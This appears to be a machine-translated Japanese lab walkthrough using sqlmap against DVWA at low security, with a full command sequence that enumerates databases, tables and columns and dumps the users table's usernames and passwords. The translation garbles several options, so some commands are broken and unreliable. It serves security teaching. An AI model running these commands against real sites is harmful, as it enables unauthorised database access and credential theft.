【SQLmap】DVWA-SQLインジェクション(低)
Sqlmap Dvwa Sql Injection Low
①sqlmapディレクトリに入り、使用する-uアドレスにアクセスするコマンド:
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '
302へのジャンプを見つけ、リダイレクトされたため、これは機能しません...
ブラウザページに戻ってリクエストを確認しましたが、Cookieがあることがわかりました。Cookieを追加します。
②使用 - クッキー対応する低レベルのCookieを使用してコマンドを実行し、再実行してください。おびえたので尋ねられたので、便利さのために、そして - バッチコマンド、あなたは自動的に質問に答えることができます:
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch
成功を実行します。
③次に、データベースについて実行し、--dbsコマンド:
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch --dbs
8つのデータベースがあることがわかります。
④それなら使えます-Dcommandデータベースを指定します。-テーブルすべてのテーブルの場所を確認するコマンド
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa --tables
ああ、2つのテーブルがあります。確かに、ユーザー内のユーザー情報テーブルには明らかです。
⑤と-Tコマンドは、テーブルを指定します。-列テーブルの列を表示するコマンド:
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa -T users- -列
目の前の勝利の夜明け。テーブルにフィールドuserとpassword、つまりユーザー名とpasswordがあることがわかります。
⑥最後に、-C必要な列を指定するコマンドは、 - 投げ捨てるここで、コマンドはデータを出力します:
python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa -T users- Cユーザー、パスワード--dump
OK、ユーザー名とパスワードが表示され、パスワードもプレーンテキストに翻訳されています。